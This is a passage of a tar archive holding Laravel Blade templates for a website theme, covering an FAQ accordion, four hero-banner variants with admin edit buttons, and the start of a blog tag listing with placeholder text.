0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('section check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Frequently Asked Questions Section Start //--> <section class="section" id="faqsection"> <div class="container"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif @isset($faq_section_style2) <div class="row justify-content-center"> <div class="col-lg-6"> <div class="section-heading"> <span>@php echo html_entity_decode($faq_section_style2->section_title); @endphp</span> <h2>@php echo html_entity_decode($faq_section_style2->title); @endphp</h2> </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row justify-content-center"> <div class="col-lg-6"> <div class="section-heading"> <span>FAQ</span> <h2>Frequently Asked <br> Questions</h2> </div> </div> </div> @endif @endisset @if (is_countable($faqs_style2) && count($faqs_style2) > 0) @php $the_number_of_faqs = count($faqs_style2); if ($the_number_of_faqs %2 == 0) { $half_of_faqs = $the_number_of_faqs / 2 + 1; } else { $half_of_faqs = (integer)($the_number_of_faqs / 2) + 2; } @endphp <div class="row"> <div class="col-lg-6"> @foreach ($faqs_style2 as $faq_style2) @if ($loop->iteration < $half_of_faqs) @if(Auth::user()) @can('section check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="faq.edit"> <input type="hidden" name="single_id" value="{{ $faq_style2->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="accordion-item"> <div class="accordion-item-header" id="accordionHeadingOne{{ $loop->iteration }}"> <a href="#" data-bs-toggle="collapse" data-bs-target="#accordionItemOne{{ $loop->iteration }}" aria-expanded="false" aria-controls="accordionItemOne{{ $loop->iteration }}" class="collapsed"> <i class="fas fa-question"></i> <span>{{ $faq_style2->question }}</span> </a> </div> <div id="accordionItemOne{{ $loop->iteration }}" class="collapse" aria-labelledby="accordionHeadingOne{{ $loop->iteration }}" style=""> <div class="accordion-body"> <p>@php echo html_entity_decode($faq_style2->answer); @endphp</p> </div> </div> </div> @else @break @endif @endforeach @unset ($faq_style2) </div> <div class="col-lg-6 accordion-resp-mt"> @foreach ($faqs_style2 as $faq_style2) @if ($loop->iteration >= $half_of_faqs) @if(Auth::user()) @can('section check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="faq.edit"> <input type="hidden" name="single_id" value="{{ $faq_style2->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="accordion-item"> <div class="accordion-item-header" id="accordionHeadingTwo{{ $loop->iteration }}"> <a href="#" data-bs-toggle="collapse" data-bs-target="#accordionItemTwo{{ $loop->iteration }}" aria-expanded="false" aria-controls="accordionItemTwo{{ $loop->iteration }}" class="collapsed"> <i class="fas fa-question"></i> <span>{{ $faq_style2->question }}</span> </a> </div> <div id="accordionItemTwo{{ $loop->iteration }}" class="collapse" aria-labelledby="accordionHeadingTwo{{ $loop->iteration }}" style=""> <div class="accordion-body"> <p>@php echo html_entity_decode($faq_style2->answer); @endphp</p> </div> </div> </div> @endif @endforeach @unset ($faq_style2) </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-lg-6"> <div class="accordion-item"> <div class="accordion-item-header" id="accordionHeadingOne"> <a href="#" data-bs-toggle="collapse" data-bs-target="#accordionItemOne" aria-expanded="false" aria-controls="accordionItemOne" class="collapsed"> <i class="fas fa-question"></i> <span>How Are The Packages Updated ?</span> </a> </div> <div id="accordionItemOne" class="collapse" aria-labelledby="accordionHeadingOne" style=""> <div class="accordion-body"> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English. </p> </div> </div> </div> <div class="accordion-item"> <div class="accordion-item-header" id="accordionHeaderTwo"> <a href="#" data-bs-toggle="collapse" data-bs-target="#accordionItemTwo" aria-expanded="false" aria-controls="accordionItemTwo"> <i class="fas fa-question"></i> <span>How to install this program?</span> </a> </div> <div id="accordionItemTwo" class="collapse" aria-labelledby="accordionHeaderTwo"> <div class="accordion-body"> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English. </p> </div> </div> </div> <div class="accordion-item"> <div class="accordion-item-header" id="accordionHeaderThree"> <a href="#" data-bs-toggle="collapse" data-bs-target="#accordionItemThree" aria-expanded="false" aria-controls="accordionItemThree"> <i class="fas fa-question"></i> <span>How do I edit the dashboard panel?</span> </a> </div> <div id="accordionItemThree" class="collapse" aria-labelledby="accordionHeaderThree"> <div class="accordion-body"> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English. </p> </div> </div> </div> </div> <div class="col-lg-6 accordion-resp-mt"> <div class="accordion-item"> <div class="accordion-item-header" id="accordionHeadingFour"> <a href="#" data-bs-toggle="collapse" data-bs-target="#accordionItemFour" aria-expanded="false" aria-controls="accordionItemFour" class="collapsed"> <i class="fas fa-question"></i> <span>How do i get new updates for free?</span> </a> </div> <div id="accordionItemFour" class="collapse" aria-labelledby="accordionHeadingFour" style=""> <div class="accordion-body"> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English. </p> </div> </div> </div> <div class="accordion-item"> <div class="accordion-item-header" id="accordionHeaderFive"> <a href="#" data-bs-toggle="collapse" data-bs-target="#accordionItemFive" aria-expanded="false" aria-controls="accordionItemFive"> <i class="fas fa-question"></i> <span>How can I upload a screenshot?</span> </a> </div> <div id="accordionItemFive" class="collapse" aria-labelledby="accordionHeaderFive"> <div class="accordion-body"> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English. </p> </div> </div> </div> <div class="accordion-item"> <div class="accordion-item-header" id="accordionHeaderSix"> <a href="#" data-bs-toggle="collapse" data-bs-target="#accordionItemSix" aria-expanded="false" aria-controls="accordionItemSix"> <i class="fas fa-question"></i> <span>How do I activate multiple users?</span> </a> </div> <div id="accordionItemSix" class="collapse" aria-labelledby="accordionHeaderSix"> <div class="accordion-body"> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English. </p> </div> </div> </div> </div> </div> @endif @endif </div> </section> <!--// Frequently Asked Questions Section End //--> @if(Auth::user()) @can('section check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="faq.create"> <input type="hidden" name="style" value="style2"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="faq.create"> <input type="hidden" name="style" value="style2"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_faq') }} </button> </form> </div> </div> @endcan @endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/banner/banner-style1.blade.php����������������������������������������������0000644�����������������00000023600�14765366572�0017105 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('section check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Hero Section Start //--> <section class="hero-banner" data-scroll-index="1"> <div class="container"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row align-items-center"> @isset ($banner_style1) <div class="col-lg-7 col-xl-6 col-md-10 wow fadeInUp"> <div class="hero-inner"> <h1>@php echo html_entity_decode($banner_style1->title); @endphp</h1> <h2>@php echo html_entity_decode($banner_style1->description); @endphp</h2> @if (!empty($banner_style1->button_name)) <a href="{{ $banner_style1->button_url }}" class="white-btn me-md-3 mb-3"> <span class="text">{{ $banner_style1->button_name }}</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> @endif @if (!empty($banner_style1->button_name_2)) <a href="{{ $banner_style1->button_url_2 }}" class="white-btn"> <span class="text">{{ $banner_style1->button_name_2 }}</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> @endif </div> </div> <div class="col-lg-5 col-xl-6 col-md-12 hero-img-resp wow fadeInUp" data-wow-duration="0.7s" data-wow-delay="0.5s"> @if (!empty($banner_style1->section_image)) <div class="hero-img"> <div class="border-line-outer"> <div class="border-line-inner"> <img src="{{ asset('uploads/img/banner/'.$banner_style1->section_image) }}" title="banner image" alt="banner image" class="img-fluid"> </div> </div> </div> @endif </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="col-lg-7 col-xl-6 col-md-10 wow fadeInUp"> <div class="hero-inner"> <h1> Introduce Our Creative Agency. </h1> <h2> Always new beginnings can move the business forward.A user experience is required before service.Now is a great opportunity to work with our and move your brand forward. </h2> <a href="#" data-scroll-nav="4" class="white-btn"> <span class="text">View Works</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> </div> </div> <div class="col-lg-5 col-xl-6 col-md-12 hero-img-resp wow fadeInUp" data-wow-duration="0.7s" data-wow-delay="0.5s"> <div class="hero-img"> <div class="border-line-outer"> <div class="border-line-inner"> <img src="{{ asset('uploads/img/dummy/354x354.jpg') }}" title="banner image" alt="banner image" class="img-fluid"> </div> </div> </div> </div> @endif @endisset </div> </div> @if (is_countable($socials) && count($socials) > 0) <ul class="hero-social-list"> @foreach ($socials as $social) @if ($social->social_media == 'fab fa-twitter') <li><a href="{{ $social->url }}"><img src="{{ asset('uploads/img/dummy/x-twitter-white.svg') }}" alt="x icon"></a></li> @else <li><a href="{{ $social->url }}"><i class="{{ $social->social_media }}"></i></a></li> @endif @endforeach @unset ($social) </ul> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <ul class="hero-social-list"> <li><a href="javascript:void(0)"><i class="fab fa-github"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-facebook"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-twitter"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-instagram"></i></a></li> </ul> @endif @endif @isset ($header_info_style1) <a href="mailto:{{ $header_info_style1->email }}" class="hero-email-link">{{ $header_info_style1->email }}</a> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <a href="mailto:elsecolor@example.com" class="hero-email-link">elsecolor@example.com</a> @endif @endisset </section> <!--// Hero Section End //--> @if(Auth::user()) @can('section check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="banner.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_banner') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="social.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-plus text-white"></i> {{ __('content.edit_social') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="header-info.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.edit_email') }} </button> </form> </div> </div> @endcan @endif ��������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/banner/banner-style4.blade.php����������������������������������������������0000644�����������������00000020424�14765366572�0017111 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('section check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Hero Section Start //--> <section class="hero-banner" id="hero_video" data-scroll-index="1"> @isset ($banner_style4) <div id="video-background" data-video-bg="true" class="player bg-overlay" data-property="{videoURL:'{{ $banner_style4->youtube_video_url }}',containment:'#hero_video',showControls:false, autoPlay:true, loop:true, mute:true, startAt:0, opacity:1, quality:'default'}"> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div id="video-background" data-video-bg="true" class="player bg-overlay" data-property="{videoURL:'https://www.youtube.com/watch?v=vtxVK3sbZ0o&t=328s',containment:'#hero_video',showControls:false, autoPlay:true, loop:true, mute:true, startAt:0, opacity:1, quality:'default'}"> </div> @endif @endisset <div class="hero-overlay"></div> <div class="container"> <div class="row align-items-center"> @isset ($banner_style4) <div class="col-lg-7 col-xl-6 col-md-10 wow fadeInUp"> <div class="hero-inner"> <h1>@php echo html_entity_decode($banner_style4->title); @endphp</h1> <h2>@php echo html_entity_decode($banner_style4->description); @endphp</h2> @if (!empty($banner_style4->button_name)) <a href="{{ $banner_style4->button_url }}" class="white-btn me-md-3 mb-3"> <span class="text">{{ $banner_style4->button_name }}</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> @endif @if (!empty($banner_style4->button_name_2)) <a href="{{ $banner_style4->button_url_2 }}" class="white-btn"> <span class="text">{{ $banner_style4->button_name_2 }}</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> @endif </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="col-lg-7 col-xl-6 col-md-10 wow fadeInUp"> <div class="hero-inner"> <h1> Introduce Our Creative Agency. </h1> <h2> Always new beginnings can move the business forward.A user experience is required before service.Now is a great opportunity to work with our and move your brand forward. </h2> <a href="#" data-scroll-nav="4" class="white-btn"> <span class="text">View Works</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> </div> </div> @endif @endisset </div> </div> @if (is_countable($socials) && count($socials) > 0) <ul class="hero-social-list"> @foreach ($socials as $social) @if ($social->social_media == 'fab fa-twitter') <li><a href="{{ $social->url }}"><img src="{{ asset('uploads/img/dummy/x-twitter-white.svg') }}" alt="x icon"></a></li> @else <li><a href="{{ $social->url }}"><i class="{{ $social->social_media }}"></i></a></li> @endif @endforeach @unset ($social) </ul> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <ul class="hero-social-list"> <li><a href="javascript:void(0)"><i class="fab fa-github"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-facebook"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-twitter"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-instagram"></i></a></li> </ul> @endif @endif @isset ($header_info_style1) <a href="mailto:{{ $header_info_style1->email }}" class="hero-email-link">{{ $header_info_style1->email }}</a> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <a href="mailto:elsecolor@example.com" class="hero-email-link">elsecolor@example.com</a> @endif @endisset </section> <!--// Hero Section End //--> @if(Auth::user()) @can('section check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="banner.create"> <input type="hidden" name="style" value="style4"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_banner') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="social.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-plus text-white"></i> {{ __('content.edit_social') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="header-info.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.edit_email') }} </button> </form> </div> </div> @endcan @endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/banner/banner-style2.blade.php����������������������������������������������0000644�����������������00000023276�14765366572�0017117 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('section check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Hero Section Start //--> <section class="hero-banner" data-scroll-index="1"> <div id="heroparticles"></div> <div class="container"> <div class="row align-items-center"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif @isset ($banner_style2) <div class="col-lg-7 col-xl-6 col-md-10 wow fadeInUp"> <div class="hero-inner"> <h1>@php echo html_entity_decode($banner_style2->title); @endphp</h1> <h2>@php echo html_entity_decode($banner_style2->description); @endphp</h2> @if (!empty($banner_style2->button_name)) <a href="{{ $banner_style2->button_url }}" class="white-btn me-md-3 mb-3"> <span class="text">{{ $banner_style2->button_name }}</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> @endif @if (!empty($banner_style2->button_name_2)) <a href="{{ $banner_style2->button_url_2 }}" class="white-btn"> <span class="text">{{ $banner_style2->button_name_2 }}</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> @endif </div> </div> <div class="col-lg-5 col-xl-6 col-md-12 hero-img-resp wow fadeInUp" data-wow-duration="0.7s" data-wow-delay="0.5s"> @if (!empty($banner_style2->section_image)) <div class="hero-img"> <div class="border-line-outer"> <div class="border-line-inner"> <img src="{{ asset('uploads/img/banner/'.$banner_style2->section_image) }}" title="banner image" alt="banner image" class="img-fluid"> </div> </div> </div> @endif </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="col-lg-7 col-xl-6 col-md-10 wow fadeInUp"> <div class="hero-inner"> <h1> Introduce Our Creative Agency. </h1> <h2> Always new beginnings can move the business forward.A user experience is required before service.Now is a great opportunity to work with our and move your brand forward. </h2> <a href="#" data-scroll-nav="4" class="white-btn"> <span class="text">View Works</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> </div> </div> <div class="col-lg-5 col-xl-6 col-md-12 hero-img-resp wow fadeInUp" data-wow-duration="0.7s" data-wow-delay="0.5s"> <div class="hero-img"> <div class="border-line-outer"> <div class="border-line-inner"> <img src="{{ asset('uploads/img/dummy/354x354.jpg') }}" title="banner image" alt="banner image" class="img-fluid"> </div> </div> </div> </div> @endif @endisset </div> </div> @if (is_countable($socials) && count($socials) > 0) <ul class="hero-social-list"> @foreach ($socials as $social) @if ($social->social_media == 'fab fa-twitter') <li><a href="{{ $social->url }}"><img src="{{ asset('uploads/img/dummy/x-twitter-white.svg') }}" alt="x icon"></a></li> @else <li><a href="{{ $social->url }}"><i class="{{ $social->social_media }}"></i></a></li> @endif @endforeach @unset ($social) </ul> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <ul class="hero-social-list"> <li><a href="javascript:void(0)"><i class="fab fa-github"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-facebook"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-twitter"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-instagram"></i></a></li> </ul> @endif @endif @isset ($header_info_style1) <a href="mailto:{{ $header_info_style1->email }}" class="hero-email-link">{{ $header_info_style1->email }}</a> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <a href="mailto:elsecolor@example.com" class="hero-email-link">elsecolor@example.com</a> @endif @endisset </section> <!--// Hero Section End //--> @if(Auth::user()) @can('section check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="banner.create"> <input type="hidden" name="style" value="style2"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_banner') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="social.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-plus text-white"></i> {{ __('content.edit_social') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="header-info.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.edit_email') }} </button> </form> </div> </div> @endcan @endif ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/banner/banner-style3.blade.php����������������������������������������������0000644�����������������00000017561�14765366572�0017120 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('section check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Hero Section Start //--> <section class="hero-banner" id="heroSliderContainer" data-scroll-index="1"> <div class="container h-100"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row h-100 align-items-center"> @isset ($banner_style3) <div class="col-lg-7 col-xl-6 col-md-10 wow fadeInUp"> <div class="hero-inner"> <h1>@php echo html_entity_decode($banner_style3->title); @endphp</h1> <h2>@php echo html_entity_decode($banner_style3->description); @endphp</h2> @if (!empty($banner_style3->button_name)) <a href="{{ $banner_style3->button_url }}" class="white-btn me-md-3 mb-3"> <span class="text">{{ $banner_style3->button_name }}</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> @endif @if (!empty($banner_style3->button_name_2)) <a href="{{ $banner_style3->button_url_2 }}" class="white-btn"> <span class="text">{{ $banner_style3->button_name_2 }}</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> @endif </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="col-lg-7 col-xl-6 col-md-10 wow fadeInUp"> <div class="hero-inner"> <h1> Introduce Our Creative Agency. </h1> <h2> Always new beginnings can move the business forward.A user experience is required before service.Now is a great opportunity to work with our and move your brand forward. </h2> <a href="#" data-scroll-nav="4" class="white-btn"> <span class="text">View Works</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> </div> </div> @endif @endisset </div> </div> @if (is_countable($socials) && count($socials) > 0) <ul class="hero-social-list"> @foreach ($socials as $social) @if ($social->social_media == 'fab fa-twitter') <li><a href="{{ $social->url }}"><img src="{{ asset('uploads/img/dummy/x-twitter-white.svg') }}" alt="x icon"></a></li> @else <li><a href="{{ $social->url }}"><i class="{{ $social->social_media }}"></i></a></li> @endif @endforeach @unset ($social) </ul> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <ul class="hero-social-list"> <li><a href="javascript:void(0)"><i class="fab fa-github"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-facebook"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-twitter"></i></a></li> <li><a href="javascript:void(0)"><i class="fab fa-instagram"></i></a></li> </ul> @endif @endif @isset ($header_info_style1) <a href="mailto:{{ $header_info_style1->email }}" class="hero-email-link">{{ $header_info_style1->email }}</a> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <a href="mailto:elsecolor@example.com" class="hero-email-link">elsecolor@example.com</a> @endif @endisset </section> <!--// Hero Section End //--> @if(Auth::user()) @can('section check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="banner.create"> <input type="hidden" name="style" value="style3"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_banner') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="social.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-plus text-white"></i> {{ __('content.edit_social') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="header-info.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.edit_email') }} </button> </form> </div> </div> @endcan @endif �����������������������������������������������������������������������������������������������������������������������������������������������views/frontend/blog/tag-index-list.blade.php��������������������������������������������������������0000644�����������������00000051656�14765366572�0015115 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('blog check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Blog Section Start //--> <section class="section" id="blog"> <div class="container"> @if(Auth::user()) @can('blog check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif @if (is_countable($blogs_paginate_style) && count($blogs_paginate_style) > 0) <div class="row"> @foreach ($blogs_paginate_style as $item) <div class="col-lg-4 col-md-6"> @if(Auth::user()) @can('blog check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="blog.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="blog-item"> @if (!empty($item->section_image)) @if (!empty($blog_detail_show->page_uri)) <div class="blog-img"> <a href="{{ url($blog_detail_show->page_uri.'/'.$item->slug) }}"> <img src="{{ asset('uploads/img/blog/thumbnail/'.$item->section_image) }}" alt="Blog image" class="img-fluid"> </a> </div> @else <div class="blog-img"> <a href="{{ route('default-blog-detail-show', ['slug' => $item->slug]) }}"> <img src="{{ asset('uploads/img/blog/thumbnail/'.$item->section_image) }}" alt="Blog image" class="img-fluid"> </a> </div> @endif @else @if (!empty($blog_detail_show->page_uri)) <div class="blog-img"> <a href="{{ url($blog_detail_show->page_uri.'/'.$item->slug) }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> @else <div class="blog-img"> <a href="{{ route('default-blog-detail-show', ['slug' => $item->slug]) }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> @endif @endif <div class="blog-body"> <div class="blog-meta"> <a href="#"> <span><i class="far fa-user"></i>@if ($item->type == "with_this_account") {{ $item->author_name }} @else {{ __('frontend.anonymous') }} @endif</span> </a> <a href="#"> <span><i class="far fa-bookmark"></i>{{ $item->category_name }}</span> </a> </div> <h5> @if (!empty($blog_detail_show->page_uri)) <a href="{{ url($blog_detail_show->page_uri.'/'.$item->slug) }}">{{ $item->title }}</a> @else <a href="{{ route('default-blog-detail-show', ['slug' => $item->slug]) }}">{{ $item->title }}</a> @endif </h5> @if (!empty($item->short_description)) <p>{{ $item->short_description }}</p> @endif @if (!empty($blog_detail_show->page_uri)) <a href="{{ url($blog_detail_show->page_uri.'/'.$item->slug) }}" class="blog-link">{{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i> </a> @else <a href="{{ route('default-blog-detail-show', ['slug' => $item->slug]) }}" class="blog-link"> {{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i> </a> @endif </div> </div> </div> @endforeach @unset 